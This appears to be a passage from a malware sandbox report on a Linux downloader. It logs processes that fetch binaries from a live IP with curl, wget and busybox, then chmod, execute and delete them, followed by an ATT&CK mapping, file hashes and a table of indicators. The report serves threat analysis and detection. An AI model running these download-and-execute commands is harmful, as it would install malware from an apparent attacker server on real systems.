  curl -O http://87.120.125.191/bins/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  - Writes file to tmp directory
  PID:1678
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  PID:1679
- /bin/chmod
  chmod 777 15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  - File and Directory Permissions Modification
  PID:1680
- /tmp/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  ./15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  - Executes dropped EXE
  PID:1681
- /bin/rm
  rm 15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  PID:1682
- /usr/bin/wget
  wget http://87.120.125.191/bins/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  PID:1683
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  - Writes file to tmp directory
  PID:1684
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  PID:1685
- /bin/chmod
  chmod 777 jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  - File and Directory Permissions Modification
  PID:1686
- /tmp/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  ./jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  - Executes dropped EXE
  PID:1687
- /bin/rm
  rm jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  PID:1688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
/tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI

Filesize
176B

MD5
e1732e70f015e99d14dff1eeeaec9966

SHA1
c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113

SHA256
6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e

SHA512
6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Download Submit

ioc	pid	Process
/tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G	1515	fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
/tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI	1521	gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
/tmp/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn	1535	uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
/tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7	1542	lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
/tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2	1548	vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
/tmp/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p	1554	15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
/tmp/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG	1560	jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
/tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0	1566	ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
/tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk	1572	FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
/tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ	1578	S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
/tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji	1584	7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
/tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN	1590	NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
/tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw	1596	EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
/tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV	1602	oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
/tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk	1608	FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
/tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ	1614	S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
/tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0	1620	ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
/tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw	1626	EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
/tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV	1632	oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
/tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji	1638	7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
/tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN	1644	NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
/tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7	1650	lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
/tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2	1656	vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
/tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G	1662	fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
/tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI	1668	gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
/tmp/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn	1675	uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
/tmp/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p	1681	15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
/tmp/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG	1687	jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG